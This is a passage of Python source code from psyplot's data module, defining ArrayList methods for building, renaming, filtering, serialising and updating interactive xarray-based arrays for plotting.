arr.is_unstructured
for arr in self]
@property
def coords(self):
"""Names of the coordinates of the arrays in this list"""
return set(chain(*(arr.coords for arr in self)))
@property
def coords_intersect(self):
"""Coordinates of the arrays in this list that are used in all arrays
"""
return set.intersection(*map(
set, (getattr(arr, 'coords_intersect', arr.coords) for arr in self)
))
@property
def with_plotter(self):
"""The arrays in this instance that are visualized with a plotter"""
return self.__class__(
(arr for arr in self if arr.psy.plotter is not None),
            auto_update=not bool(self.no_auto_update))
no_auto_update = property(_no_auto_update_getter,
doc=_no_auto_update_getter.__doc__)
@no_auto_update.setter
def no_auto_update(self, value):
for arr in self:
arr.psy.no_auto_update = value
self.no_auto_update.value = bool(value)
@property
def logger(self):
""":class:`logging.Logger` of this instance"""
try:
return self._logger
except AttributeError:
name = '%s.%s' % (self.__module__, self.__class__.__name__)
self._logger = logging.getLogger(name)
self.logger.debug('Initializing...')
return self._logger
@logger.setter
def logger(self, value):
self._logger = value
@property
def arrays(self):
"""A list of all the :class:`xarray.DataArray` instances in this list
"""
return list(chain.from_iterable(
([arr] if not isinstance(arr, InteractiveList) else arr.arrays
for arr in self)))
@docstrings.get_sections(base='ArrayList.rename', sections=[
'Parameters', 'Raises'])
@dedent
def rename(self, arr, new_name=True):
"""
Rename an array to find a name that isn't already in the list
Parameters
----------
arr: InteractiveBase
A :class:`InteractiveArray` or :class:`InteractiveList` instance
whose name shall be checked
        new_name: bool or str
            If False and the ``arr_name`` attribute of the new array is
            already in the list, a ValueError is raised. If True, the name
            is kept when it is not already in the list and set to
            ``'arr{0}'`` otherwise. If a string, it is used for the
            renaming no matter whether the current name is in use or not.
            ``'{0}'`` is replaced by a counter
Returns
-------
InteractiveBase
`arr` with changed ``arr_name`` attribute
bool or None
True, if the array has been renamed, False if not and None if the
array is already in the list
Raises
------
ValueError
If it was impossible to find a name that isn't already in the list
ValueError
If `new_name` is False and the array is already in the list"""
name_in_me = arr.psy.arr_name in self.arr_names
if not name_in_me:
return arr, False
elif name_in_me and not self._contains_array(arr):
            if new_name is False:
                raise ValueError(
                    "Array name %s is already in use! Set the `new_name` "
                    "parameter to True for renaming!" % arr.psy.arr_name)
            else:
                new_name = new_name if isstring(new_name) else 'arr{0}'
                arr.psy.arr_name = self.next_available_name(new_name)
                return arr, True
return arr, None
docstrings.keep_params('ArrayList.rename.parameters', 'new_name')
docstrings.keep_params('InteractiveBase.parameters', 'auto_update')
@docstrings.get_sections(base='ArrayList')
@docstrings.dedent
def __init__(self, iterable=[], attrs={}, auto_update=None, new_name=True):
"""
Parameters
----------
iterable: iterable
The iterable (e.g. another list) defining this list
attrs: dict-like or iterable, optional
Global attributes of this list
%(InteractiveBase.parameters.auto_update)s
%(ArrayList.rename.parameters.new_name)s"""
super(ArrayList, self).__init__()
self.attrs = OrderedDict(attrs)
if auto_update is None:
auto_update = rcParams['lists.auto_update']
        self.no_auto_update = not bool(auto_update)
# append the data in order to set the correct names
self.extend(filter(
lambda arr: isinstance(getattr(arr, 'psy', None),
InteractiveBase),
iterable), new_name=new_name)
def copy(self, deep=False):
"""Returns a copy of the list
Parameters
----------
deep: bool
If False (default), only the list is copied and not the contained
arrays, otherwise the contained arrays are deep copied"""
if not deep:
return self.__class__(self[:], attrs=self.attrs.copy(),
auto_update=not bool(self.no_auto_update))
else:
return self.__class__(
[arr.psy.copy(deep) for arr in self], attrs=self.attrs.copy(),
                auto_update=not bool(self.no_auto_update))
docstrings.keep_params('InteractiveArray.update.parameters', 'method')
@classmethod
@docstrings.get_sections(base='ArrayList.from_dataset', sections=[
'Parameters', 'Other Parameters', 'Returns'])
@docstrings.dedent
def from_dataset(cls, base, method='isel', default_slice=None,
decoder=None, auto_update=None, prefer_list=False,
squeeze=True, attrs=None, load=False, **kwargs):
"""
Construct an ArrayList instance from an existing base dataset
Parameters
----------
base: xarray.Dataset
Dataset instance that is used as reference
%(InteractiveArray.update.parameters.method)s
%(InteractiveBase.parameters.auto_update)s
prefer_list: bool
            If True and multiple variable names per array are found, the
:class:`InteractiveList` class is used. Otherwise the arrays are
put together into one :class:`InteractiveArray`.
default_slice: indexer
Index (e.g. 0 if `method` is 'isel') that shall be used for
dimensions not covered by `dims` and `furtherdims`. If None, the
whole slice will be used.
decoder: CFDecoder or dict
Arguments for the decoder. This can be one of
- an instance of :class:`CFDecoder`
- a subclass of :class:`CFDecoder`
- a dictionary with keyword-arguments to the automatically
determined decoder class
- None to automatically set the decoder
squeeze: bool, optional
            Default True. If True and the created arrays have an axis with
length 1, it is removed from the dimension list (e.g. an array
with shape (3, 4, 1, 5) will be squeezed to shape (3, 4, 5))
attrs: dict, optional
Meta attributes that shall be assigned to the selected data arrays
(additional to those stored in the `base` dataset)
load: bool or dict
If True, load the data from the dataset using the
:meth:`xarray.DataArray.load` method. If :class:`dict`, those will
be given to the above mentioned ``load`` method
Other Parameters
----------------
%(setup_coords.parameters)s
Returns
-------
ArrayList
The list with the specified :class:`InteractiveArray` instances
            that hold a reference to the given `base`
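
        Examples
        --------
        A minimal sketch, assuming ``base`` contains a variable ``'t2m'``
        with a ``'time'`` dimension (names are hypothetical)::

            arrays = ArrayList.from_dataset(base, name='t2m', time=[0, 1])
        """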
try:
load = dict(load)
except (TypeError, ValueError):
def maybe_load(arr):
return arr.load() if load else arr
else:
def maybe_load(arr):
return arr.load(**load)
def iter_dims(dims):
"""Split the given dictionary into multiples and iterate over it"""
if not dims:
while 1:
yield {}
else:
dims = OrderedDict(dims)
keys = dims.keys()
for vals in zip(*map(cycle, map(safe_list, dims.values()))):
yield dict(zip(keys, vals))
def recursive_selection(key, dims, names):
names = safe_list(names)
if len(names) > 1 and prefer_list:
keys = ('arr%i' % i for i in range(len(names)))
return InteractiveList(
starmap(sel_method, zip(keys, iter_dims(dims), names)),
auto_update=auto_update, arr_name=key)
elif len(names) > 1:
return sel_method(key, dims, tuple(names))
else:
return sel_method(key, dims, names[0])
def ds2arr(arr):
base_var = next(var for key, var in arr.variables.items()
if key not in arr.coords)
attrs = base_var.attrs
arr = arr.to_array()
if 'coordinates' in base_var.encoding:
arr.encoding['coordinates'] = base_var.encoding[
'coordinates']
arr.attrs.update(attrs)
return arr
decoder_input = decoder
def get_decoder(arr):
if decoder_input is None:
return CFDecoder.get_decoder(base, arr)
elif isinstance(decoder_input, CFDecoder):
return decoder_input
elif isinstance(decoder_input, dict):
return CFDecoder.get_decoder(base, arr, **decoder_input)
else:
return decoder_input(base)
def add_missing_dimensions(arr):
            # add the missing dimensions to the dataset. This is no longer
            # done by default by xarray >= 0.9, but we need it to ensure the
            # interactive treatment of DataArrays
missing = set(arr.dims).difference(base.coords) - {'variable'}
for dim in missing:
base[dim] = arr.coords[dim] = np.arange(base.dims[dim])
if squeeze:
def squeeze_array(arr):
return arr.isel(**{dim: 0 for i, dim in enumerate(arr.dims)
if arr.shape[i] == 1})
else:
def squeeze_array(arr):
return arr
if method == 'isel':
def sel_method(key, dims, name=None):
if name is None:
return recursive_selection(key, dims, dims.pop('name'))
elif (isinstance(name, six.string_types) or
not utils.is_iterable(name)):
arr = base[name]
else:
arr = base[list(name)]
add_missing_dimensions(arr)
if not isinstance(arr, xr.DataArray):
arr = ds2arr(arr)
def_slice = slice(None) if default_slice is None else \
default_slice
decoder = get_decoder(arr)
dims = decoder.correct_dims(arr, dims)
dims.update({
dim: def_slice for dim in set(arr.dims).difference(
dims) if dim != 'variable'})
ret = squeeze_array(arr.isel(**dims))
# delete the variable dimension for the idims
dims.pop('variable', None)
ret.psy.init_accessor(arr_name=key, base=base, idims=dims,
decoder=decoder)
return maybe_load(ret)
else:
def sel_method(key, dims, name=None):
if name is None:
return recursive_selection(key, dims, dims.pop('name'))
elif (isinstance(name, six.string_types) or
not utils.is_iterable(name)):
arr = base[name]
else:
arr = base[list(name)]
add_missing_dimensions(arr)
if not isinstance(arr, xr.DataArray):
arr = ds2arr(arr)
# idims will be calculated by the array (maybe not the most
# efficient way...)
decoder = get_decoder(arr)
dims = decoder.correct_dims(arr, dims)
if default_slice is not None:
dims.update({
key: default_slice for key in set(arr.dims).difference(
dims) if key != 'variable'})
kws = dims.copy()
# the sel method does not work with slice objects
if not any(isinstance(idx, slice) for idx in dims.values()):
kws['method'] = method
try:
ret = arr.sel(**kws)
except KeyError:
_fix_times(kws)
ret = arr.sel(**kws)
ret = squeeze_array(ret)
ret.psy.init_accessor(arr_name=key, base=base, decoder=decoder)
return maybe_load(ret)
if 'name' not in kwargs:
default_names = list(
key for key in base.variables if key not in base.coords)
try:
default_names.sort()
except TypeError:
pass
kwargs['name'] = default_names
names = setup_coords(**kwargs)
# check coordinates
possible_keys = ['t', 'x', 'y', 'z', 'name'] + list(base.dims)
for key in set(chain(*six.itervalues(names))):
utils.check_key(key, possible_keys, name='dimension')
instance = cls(starmap(sel_method, six.iteritems(names)),
attrs=base.attrs, auto_update=auto_update)
        # convert to InteractiveLists if any instance is not one already
if prefer_list and any(
not isinstance(arr, InteractiveList) for arr in instance):
            # if any instance is an interactive list, then convert the others
if any(isinstance(arr, InteractiveList) for arr in instance):
for i, arr in enumerate(instance):
if not isinstance(arr, InteractiveList):
instance[i] = InteractiveList([arr])
else: # put everything into one single interactive list
instance = cls([InteractiveList(instance, attrs=base.attrs,
auto_update=auto_update)])
instance[0].psy.arr_name = instance[0][0].psy.arr_name
if attrs is not None:
for arr in instance:
arr.attrs.update(attrs)
return instance
@classmethod
def _get_dsnames(cls, data, ignore_keys=['attrs', 'plotter', 'ds'],
concat_dim=False, combine=False):
"""Recursive method to get all the file names out of a dictionary
        `data` created with the :meth:`array_info` method"""
def filter_ignores(item):
return item[0] not in ignore_keys and isinstance(item[1], dict)
if 'fname' in data:
return {tuple(
[data['fname'], data['store']] +
([data.get('concat_dim')] if concat_dim else []) +
([data.get('combine')] if combine else []))}
return set(chain(*map(partial(cls._get_dsnames, concat_dim=concat_dim,
combine=combine,
ignore_keys=ignore_keys),
dict(filter(filter_ignores,
six.iteritems(data))).values())))
@classmethod
def _get_ds_descriptions(
cls, data, ds_description={'ds', 'fname', 'arr'}, **kwargs):
def new_dict():
return defaultdict(list)
ret = defaultdict(new_dict)
ds_description = set(ds_description)
for d in cls._get_ds_descriptions_unsorted(data, **kwargs):
try:
num = d.get('num') or d['ds'].psy.num
except KeyError:
                raise ValueError(
                    'Could not find either the dataset number or the '
                    'dataset itself in the data! However, one of them must '
                    'be provided.')
d_ret = ret[num]
for key, val in six.iteritems(d):
if key == 'arr':
d_ret['arr'].append(d['arr'])
else:
d_ret[key] = val
return ret
@classmethod
def _get_ds_descriptions_unsorted(
cls, data, ignore_keys=['attrs', 'plotter'], nums=None):
"""Recursive method to get all the file names or datasets out of a
dictionary `data` created with the :meth`array_info` method"""
ds_description = {'ds', 'fname', 'num', 'arr', 'store'}
if 'ds' in data:
# make sure that the data set has a number assigned to it
data['ds'].psy.num
keys_in_data = ds_description.intersection(data)
if keys_in_data:
return {key: data[key] for key in keys_in_data}
for key in ignore_keys:
data.pop(key, None)
func = partial(cls._get_ds_descriptions_unsorted,
ignore_keys=ignore_keys, nums=nums)
return chain(*map(lambda d: [d] if isinstance(d, dict) else d,
map(func, six.itervalues(data))))
@classmethod
@docstrings.get_sections(base='ArrayList.from_dict')
@docstrings.dedent
def from_dict(cls, d, alternative_paths={}, datasets=None,
pwd=None, ignore_keys=['attrs', 'plotter', 'ds'],
only=None, chname={}, **kwargs):
"""
Create a list from the dictionary returned by :meth:`array_info`
This classmethod creates an :class:`~psyplot.data.ArrayList` instance
        from a dictionary containing filename, dimension information and
        array names
Parameters
----------
d: dict
The dictionary holding the data
alternative_paths: dict or list or str
A mapping from original filenames as used in `d` to filenames that
shall be used instead. If `alternative_paths` is not None,
datasets must be None. Paths must be accessible from the current
working directory.
            If a list (or any other iterable) is provided, the file names
            will be replaced as they appear in `d` (note that this is very
            unsafe if `d` is not an OrderedDict)
datasets: dict or list or None
A mapping from original filenames in `d` to the instances of
:class:`xarray.Dataset` to use. If it is an iterable, the same
holds as for the `alternative_paths` parameter
pwd: str
Path to the working directory from where the data can be imported.
If None, use the current working directory.
ignore_keys: list of str
Keys specified in this list are ignored and not seen as array
information (note that ``attrs`` are used anyway)
only: string, list or callable
Can be one of the following three things:
- a string that represents a pattern to match the array names
that shall be included
- a list of array names to include
- a callable with two arguments, a string and a dict such as
.. code-block:: python
                    def filter_func(arr_name: str, info: dict) -> bool:
'''
Filter the array names
This function should return True if the array shall be
included, else False
Parameters
----------
arr_name: str
The array name (i.e. the ``arr_name`` attribute)
info: dict
                        The dictionary with the array information. Common
keys are ``'name'`` that points to the variable name
and ``'dims'`` that points to the dimensions and
``'fname'`` that points to the file name
'''
return True or False
The function should return ``True`` if the array shall be
included, else ``False``. This function will also be given to
subsequents instances of :class:`InteractiveList` objects that
are contained in the returned value
chname: dict
A mapping from variable names in the project to variable names
that should be used instead
Other Parameters
----------------
``**kwargs``
Any other parameter from the `psyplot.data.open_dataset` function
%(open_dataset.parameters)s
Returns
-------
psyplot.data.ArrayList
The list with the interactive objects
See Also
--------
from_dataset, array_info"""
pwd = pwd or getcwd()
if only is None:
def only_filter(arr_name, info):
return True
elif callable(only):
only_filter = only
elif isstring(only):
def only_filter(arr_name, info):
return patt.search(arr_name) is not None
patt = re.compile(only)
only = None
else:
def only_filter(arr_name, info):
return arr_name in save_only
save_only = only
only = None
def get_fname_use(fname):
squeeze = isstring(fname)
fname = safe_list(fname)
ret = tuple(f if utils.is_remote_url(f) or osp.isabs(f) else
osp.join(pwd, f)
for f in fname)
return ret[0] if squeeze else ret
def get_name(name):
if not isstring(name):
return list(map(get_name, name))
else:
return chname.get(name, name)
if not isinstance(alternative_paths, dict):
it = iter(alternative_paths)
alternative_paths = defaultdict(partial(next, it, None))
# first open all datasets if not already done
if datasets is None:
replace_concat_dim = 'concat_dim' not in kwargs
replace_combine = 'combine' not in kwargs
names_and_stores = cls._get_dsnames(
d, concat_dim=True, combine=True)
datasets = {}
for fname, (store_mod, store_cls), concat_dim, combine in names_and_stores:
fname_use = fname
got = True
if replace_concat_dim and concat_dim is not None:
kwargs['concat_dim'] = concat_dim
elif replace_concat_dim and concat_dim is None:
kwargs.pop('concat_dim', None)
if replace_combine and combine is not None:
kwargs['combine'] = combine
elif replace_combine and combine is None:
kwargs.pop('combine', None)
try:
fname_use = alternative_paths[fname]
except KeyError:
got = False
if not got or not fname_use:
if fname is not None:
fname_use = get_fname_use(fname)
if fname_use is not None:
datasets[fname] = _open_ds_from_store(
fname_use, store_mod, store_cls, **kwargs)
if alternative_paths is not None:
for fname in set(alternative_paths).difference(datasets):
datasets[fname] = _open_ds_from_store(fname, **kwargs)
elif not isinstance(datasets, dict):
it_datasets = iter(datasets)
datasets = defaultdict(partial(next, it_datasets, None))
arrays = [0] * len(d)
i = 0
for arr_name, info in six.iteritems(d):
if arr_name in ignore_keys or not only_filter(arr_name, info):
arrays.pop(i)
continue
if not {'fname', 'ds', 'arr'}.intersection(info):
# the described object is an InteractiveList
arr = InteractiveList.from_dict(
info, alternative_paths=alternative_paths,
datasets=datasets, chname=chname)
if not arr:
warn("Skipping empty list %s!" % arr_name)
arrays.pop(i)
continue
else:
if 'arr' in info:
arr = info.pop('arr')
elif 'ds' in info:
arr = cls.from_dataset(
info['ds'], dims=info['dims'],
name=get_name(info['name']))[0]
else:
fname = info['fname']
if fname is None:
warn("Could not open array %s because no filename was "
"specified!" % arr_name)
arrays.pop(i)
continue
try: # in case, datasets is a defaultdict
datasets[fname]
except KeyError:
pass
if fname not in datasets:
warn("Could not open array %s because %s was not in "
"the list of datasets!" % (arr_name, fname))
arrays.pop(i)
continue
arr = cls.from_dataset(
datasets[fname], dims=info['dims'],
name=get_name(info['name']))[0]
for key, val in six.iteritems(info.get('attrs', {})):
arr.attrs.setdefault(key, val)
arr.psy.arr_name = arr_name
arrays[i] = arr
i += 1
return cls(arrays, attrs=d.get('attrs', {}))
docstrings.delete_params('get_filename_ds.parameters', 'ds', 'dump')
@docstrings.get_sections(base='ArrayList.array_info')
@docstrings.dedent
def array_info(self, dump=None, paths=None, attrs=True,
standardize_dims=True, pwd=None, use_rel_paths=True,
alternative_paths={}, ds_description={'fname', 'store'},
full_ds=True, copy=False, **kwargs):
"""
        Get dimension information on your arrays

        This method returns a dictionary containing information on the
        arrays in this instance
Parameters
----------
dump: bool
            If True and the dataset has not been dumped so far, it is dumped
            to a temporary file or the one generated by `paths` is used. If
            it is False, or if both `dump` and `paths` are None, no data
            will be stored. If it is None and `paths` is not None, `dump` is
            set to True.
%(get_filename_ds.parameters.no_ds|dump)s
attrs: bool, optional
If True (default), the :attr:`ArrayList.attrs` and
:attr:`xarray.DataArray.attrs` attributes are included in the
returning dictionary
standardize_dims: bool, optional
If True (default), the real dimension names in the dataset are
replaced by x, y, z and t to be more general.
pwd: str
Path to the working directory from where the data can be imported.
If None, use the current working directory.
use_rel_paths: bool, optional
If True (default), paths relative to the current working directory
are used. Otherwise absolute paths to `pwd` are used
ds_description: 'all' or set of {'fname', 'ds', 'num', 'arr', 'store'}
Keys to describe the datasets of the arrays. If all, all keys
are used. The key descriptions are
fname
the file name is inserted in the ``'fname'`` key
store
the data store class and module is inserted in the ``'store'``
key
ds
the dataset is inserted in the ``'ds'`` key
num
The unique number assigned to the dataset is inserted in the
``'num'`` key
arr
The array itself is inserted in the ``'arr'`` key
full_ds: bool
If True and ``'ds'`` is in `ds_description`, the entire dataset is
included. Otherwise, only the DataArray converted to a dataset is
included
copy: bool
If True, the arrays and datasets are deep copied
Other Parameters
----------------
%(get_filename_ds.other_parameters)s
Returns
-------
OrderedDict
An ordered mapping from array names to dimensions and filename
corresponding to the array
See Also
--------
        from_dict
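
        Examples
        --------
        A hedged round-trip sketch, assuming the underlying datasets are
        stored on disk::

            info = mylist.array_info()
            mylist2 = ArrayList.from_dict(info)
        """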
saved_ds = kwargs.pop('_saved_ds', {})
def get_alternative(f):
return next(filter(lambda t: osp.samefile(f, t[0]),
six.iteritems(alternative_paths)), [False, f])
if copy:
def copy_obj(obj):
# try to get the number of the dataset and create only one copy
# copy for each dataset
try:
num = obj.psy.num
except AttributeError:
pass
else:
try:
return saved_ds[num]
except KeyError:
saved_ds[num] = obj.psy.copy(True)
return saved_ds[num]
return obj.psy.copy(True)
else:
def copy_obj(obj):
return obj
ret = OrderedDict()
if ds_description == 'all':
ds_description = {'fname', 'ds', 'num', 'arr', 'store'}
if paths is not None:
if dump is None:
dump = True
paths = iter(paths)
elif dump is None:
dump = False
if pwd is None:
pwd = getcwd()
for arr in self:
if isinstance(arr, InteractiveList):
ret[arr.arr_name] = arr.array_info(
dump, paths, pwd=pwd, attrs=attrs,
standardize_dims=standardize_dims,
use_rel_paths=use_rel_paths, ds_description=ds_description,
alternative_paths=alternative_paths, copy=copy,
_saved_ds=saved_ds, **kwargs)
else:
if standardize_dims:
idims = arr.psy.decoder.standardize_dims(
next(arr.psy.iter_base_variables), arr.psy.idims)
else:
idims = arr.psy.idims
ret[arr.psy.arr_name] = d = {'dims': idims}
if 'variable' in arr.coords:
d['name'] = [list(arr.coords['variable'].values)]
else:
d['name'] = arr.name
if 'fname' in ds_description or 'store' in ds_description:
fname, store_mod, store_cls = get_filename_ds(
arr.psy.base, dump=dump, paths=paths, **kwargs)
if 'store' in ds_description:
d['store'] = (store_mod, store_cls)
if 'fname' in ds_description:
d['fname'] = []
for i, f in enumerate(safe_list(fname)):
if (f is None or utils.is_remote_url(f)):
d['fname'].append(f)
else:
found, f = get_alternative(f)
if use_rel_paths:
f = osp.relpath(f, pwd)
else:
f = osp.abspath(f)
d['fname'].append(f)
if fname is None or isinstance(fname,
six.string_types):
d['fname'] = d['fname'][0]
else:
d['fname'] = tuple(safe_list(fname))
if arr.psy.base.psy._concat_dim is not None:
d['concat_dim'] = arr.psy.base.psy._concat_dim
if arr.psy.base.psy._combine is not None:
d['combine'] = arr.psy.base.psy._combine
if 'ds' in ds_description:
if full_ds:
d['ds'] = copy_obj(arr.psy.base)
else:
d['ds'] = copy_obj(arr.to_dataset())
if 'num' in ds_description:
d['num'] = arr.psy.base.psy.num
if 'arr' in ds_description:
d['arr'] = copy_obj(arr)
if attrs:
d['attrs'] = arr.attrs
ret['attrs'] = self.attrs
return ret
def _get_tnames(self):
"""Get the name of the time coordinate of the objects in this list"""
tnames = set()
for arr in self:
if isinstance(arr, InteractiveList):
tnames.update(arr.get_tnames())
else:
tnames.add(arr.psy.decoder.get_tname(
next(arr.psy.iter_base_variables), arr.coords))
return tnames - {None}
@docstrings.dedent
def _register_update(self, method='isel', replot=False, dims={}, fmt={},
force=False, todefault=False):
"""
Register new dimensions and formatoptions for updating. The keywords
are the same as for each single array
Parameters
----------
%(InteractiveArray._register_update.parameters)s"""
for arr in self:
arr.psy._register_update(method=method, replot=replot, dims=dims,
fmt=fmt, force=force, todefault=todefault)
@docstrings.get_sections(base='ArrayList.start_update')
@dedent
def start_update(self, draw=None):
"""
Conduct the registered plot updates
        This method starts the updates that have been registered by the
        :meth:`update` method. You can call this method if you did not set
        the `auto_update` parameter to True when calling the :meth:`update`
        method and the :attr:`no_auto_update` attribute is True.
Parameters
----------
draw: bool or None
If True, all the figures of the arrays contained in this list will
            be drawn at the end. If None, it defaults to the ``'auto_draw'``
parameter in the :attr:`psyplot.rcParams` dictionary
See Also
--------
:attr:`no_auto_update`, update"""
def worker(arr):
results[arr.psy.arr_name] = arr.psy.start_update(
draw=False, queues=queues)
if len(self) == 0:
return
results = {}
threads = [Thread(target=worker, args=(arr,),
name='update_%s' % arr.psy.arr_name)
for arr in self]
jobs = [arr.psy._njobs for arr in self]
queues = [Queue() for _ in range(max(map(len, jobs)))]
# populate the queues
for i, arr in enumerate(self):
for j, n in enumerate(jobs[i]):
for k in range(n):
queues[j].put(arr.psy.arr_name)
for thread in threads:
            thread.daemon = True
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if draw is None:
draw = rcParams['auto_draw']
if draw:
self(arr_name=[name for name, adraw in six.iteritems(results)
if adraw]).draw()
if rcParams['auto_show']:
self.show()
docstrings.keep_params('InteractiveArray.update.parameters',
'auto_update')
@docstrings.get_sections(base='ArrayList.update')
@docstrings.dedent
def update(self, method='isel', dims={}, fmt={}, replot=False,
auto_update=False, draw=None, force=False, todefault=False,
enable_post=None, **kwargs):
"""
Update the coordinates and the plot
This method updates all arrays in this list with the given coordinate
values and formatoptions.
Parameters
----------
%(InteractiveArray._register_update.parameters)s
%(InteractiveArray.update.parameters.auto_update)s
%(ArrayList.start_update.parameters)s
enable_post: bool
If not None, enable (``True``) or disable (``False``) the
:attr:`~psyplot.plotter.Plotter.post` formatoption in the plotters
``**kwargs``
Any other formatoption or dimension that shall be updated
(additionally to those in `fmt` and `dims`)
Notes
-----
%(InteractiveArray.update.notes)s
See Also
--------
        no_auto_update, start_update
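
        Examples
        --------
        A hedged sketch (the dimension and formatoption names are
        hypothetical)::

            mylist.update(time=1, cmap='viridis')
        """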
dims = dict(dims)
fmt = dict(fmt)
vars_and_coords = set(chain(
self.dims, self.coords, ['name', 'x', 'y', 'z', 't']))
furtherdims, furtherfmt = utils.sort_kwargs(kwargs, vars_and_coords)
dims.update(furtherdims)
fmt.update(furtherfmt)
self._register_update(method=method, replot=replot, dims=dims, fmt=fmt,
force=force, todefault=todefault)
if enable_post is not None:
for arr in self.with_plotter:
arr.psy.plotter.enable_post = enable_post
if not self.no_auto_update or auto_update:
self.start_update(draw)
def draw(self):
"""Draws all the figures in this instance"""
for fig in set(chain(*map(
lambda arr: arr.psy.plotter.figs2draw, self.with_plotter))):
self.logger.debug("Drawing figure %s", fig.number)
fig.canvas.draw()
for arr in self:
if arr.psy.plotter is not None:
arr.psy.plotter._figs2draw.clear()
self.logger.debug("Done drawing.")
def __call__(self, types=None, method='isel', fmts=[], **attrs):
"""Get the arrays specified by their attributes
Parameters
----------
types: type or tuple of types
Any class that shall be used for an instance check via
:func:`isinstance`. If not None, the :attr:`plotter` attribute
of the array is checked against this `types`
method: {'isel', 'sel'}
Selection method for the dimensions in the arrays to be used.
If `method` is 'isel', dimension values in `attrs` must correspond
to integer values as they are found in the
:attr:`InteractiveArray.idims` attribute.
Otherwise the :meth:`xarray.DataArray.coords` attribute is used.
fmts: list
List of formatoption strings. Only arrays with plotters who have
this formatoption are returned
``**attrs``
Parameters may be any attribute of the arrays in this instance,
including the matplotlib axes (``ax``), matplotlib figure
(``fig``) and the array name (``arr_name``).
Values may be iterables (e.g. lists) of the attributes to consider
or callable functions that accept the attribute as a value. If the
            value is a string, it will be put into a list.
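
        Examples
        --------
        Some hedged sketches (array and formatoption names are
        hypothetical)::

            mylist(arr_name='arr0')  # select by array name
            mylist(time=0)           # select by integer dimension value
            mylist(fmts=['cmap'])    # arrays whose plotter has 'cmap'
        """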
def safe_item_list(key, val):
return key, val if callable(val) else safe_list(val)
def filter_list(arr):
other_attrs = attrs.copy()
arr_names = other_attrs.pop('arr_name', None)
return ((arr_names is None or (
arr_names(arr.psy.arr_name) if callable(arr_names)
else arr.psy.arr_name in arr_names)) and
len(arr) == len(arr(types=types, method=method,
**other_attrs)))
if not attrs:
def filter_by_attrs(arr):
return True
elif method == 'sel':
def filter_by_attrs(arr):
if isinstance(arr, InteractiveList):
return filter_list(arr)
tname = arr.psy.decoder.get_tname(
next(six.itervalues(arr.psy.base_variables)))
def check_values(arr, key, vals):
if key == 'arr_name':
attr = arr.psy.arr_name
elif key == 'ax':
attr = arr.psy.ax
elif key == 'fig':
attr = getattr(arr.psy.ax, 'figure', None)
else:
try:
attr = getattr(arr, key)
except AttributeError:
return False
if np.ndim(attr): # do not filter for multiple items
return False
if hasattr(arr.psy, 'decoder') and (
arr.name == tname):
try:
vals = np.asarray(vals, dtype=np.datetime64)
except ValueError:
pass
else:
return attr.values.astype(vals.dtype) in vals
if callable(vals):
return vals(attr)
return getattr(attr, 'values', attr) in vals
return all(
check_values(arr, key, val)
for key, val in six.iteritems(
arr.psy.decoder.correct_dims(next(six.itervalues(
arr.psy.base_variables)), attrs, remove=False)))
else:
def check_values(arr, key, vals):
if key == 'arr_name':
attr = arr.psy.arr_name
elif key == 'ax':
attr = arr.psy.ax
elif key == 'fig':
attr = getattr(arr.psy.ax, 'figure', None)
elif key in arr.coords:
attr = arr.psy.idims[key]
else:
try:
attr = getattr(arr, key)
except AttributeError:
return False
if np.ndim(attr): # do not filter for multiple items
return False
if callable(vals):
return vals(attr)
return attr in vals
def filter_by_attrs(arr):
if isinstance(arr, InteractiveList):
return filter_list(arr)
return all(
check_values(arr, key, val)
for key, val in six.iteritems(
arr.psy.decoder.correct_dims(next(six.itervalues(
arr.psy.base_variables)), attrs, remove=False)))
attrs = dict(starmap(safe_item_list, six.iteritems(attrs)))
ret = self.__class__(
# iterable
(arr for arr in self if
(types is None or isinstance(arr.psy.plotter, types)) and
filter_by_attrs(arr)),
# give itself as base and the auto_update parameter
            auto_update=not bool(self.no_auto_update))
# now filter for the formatoptions
if fmts:
fmts = set(safe_list(fmts))
ret = self.__class__(
filter(lambda arr: (arr.psy.plotter and
fmts <= set(arr.psy.plotter)),
ret))
return ret
def __contains__(self, val):
try:
name = val if isstring(val) else val.psy.arr_name
except AttributeError:
return False
else:
return name in self.arr_names and (
isstring(val) or self._contains_array(val))
def _contains_array(self, val):
"""Checks whether exactly this array is in the list"""
arr = self(arr_name=val.psy.arr_name)[0]
is_not_list = any(
map(lambda a: not isinstance(a, InteractiveList),
[arr, val]))
is_list = any(map(lambda a: isinstance(a, InteractiveList),
[arr, val]))
# if one is an InteractiveList and the other not, they differ
if is_list and is_not_list:
return False
# if both are interactive lists, check the lists
if is_list:
return all(a in arr for a in val) and all(a in val for a in arr)
# else we check the shapes and values
return arr is val
def _short_info(self, intend=0, maybe=False):
if maybe:
intend = 0
str_intend = ' ' * intend
if len(self) == 1:
return str_intend + "%s%s.%s([%s])" % (
'' if not hasattr(self, 'arr_name') else self.arr_name + ': ',
self.__class__.__module__, self.__class__.__name__,
self[0].psy._short_info(intend+4, maybe=True))
return str_intend + "%s%s.%s([\n%s])" % (
'' if not hasattr(self, 'arr_name') else self.arr_name + ': ',
self.__class__.__module__, self.__class__.__name__,
",\n".join(
'%s' % (
arr.psy._short_info(intend+4))
for arr in self))
def __str__(self):
return self._short_info()
def __repr__(self):
return self.__str__()
def __getitem__(self, key):
"""Overwrites lists __getitem__ by returning an ArrayList if `key` is a
slice"""
if isinstance(key, slice): # return a new ArrayList
return self.__class__(
super(ArrayList, self).__getitem__(key))
else: # return the item
return super(ArrayList, self).__getitem__(key)
if six.PY2: # for compatibility to python 2.7
def __getslice__(self, *args):
return self[slice(*args)]
def next_available_name(self, fmt_str='arr{0}', counter=None):
"""Create a new array out of the given format string
Parameters
----------
        fmt_str: str
The base string to use. ``'{0}'`` will be replaced by a counter
counter: iterable
An iterable where the numbers should be drawn from. If None,
            ``range(1000)`` is used
Returns
-------
str
            A possible name that is not in the current list
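
        Examples
        --------
        A short sketch::

            mylist.next_available_name()          # e.g. 'arr0'
            mylist.next_available_name('tmp{0}')  # e.g. 'tmp0'
        """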
names = self.arr_names
counter = counter or iter(range(1000))
try:
new_name = next(
filter(lambda n: n not in names,
map(fmt_str.format, counter)))
except StopIteration:
raise ValueError(
"{0} already in the list".format(fmt_str))
return new_name
@docstrings.dedent
def append(self, value, new_name=False):
"""
Append a new array to the list
Parameters
----------
value: InteractiveBase
The data object to append to this list
%(ArrayList.rename.parameters.new_name)s
Raises
------
%(ArrayList.rename.raises)s
See Also
--------
list.append, extend, rename"""
arr, renamed = self.rename(value, new_name)
if renamed is not None:
super(ArrayList, self).append(value)
@docstrings.dedent
def extend(self, iterable, new_name=False):
"""
Add further arrays from an iterable to this list
Parameters
----------
iterable
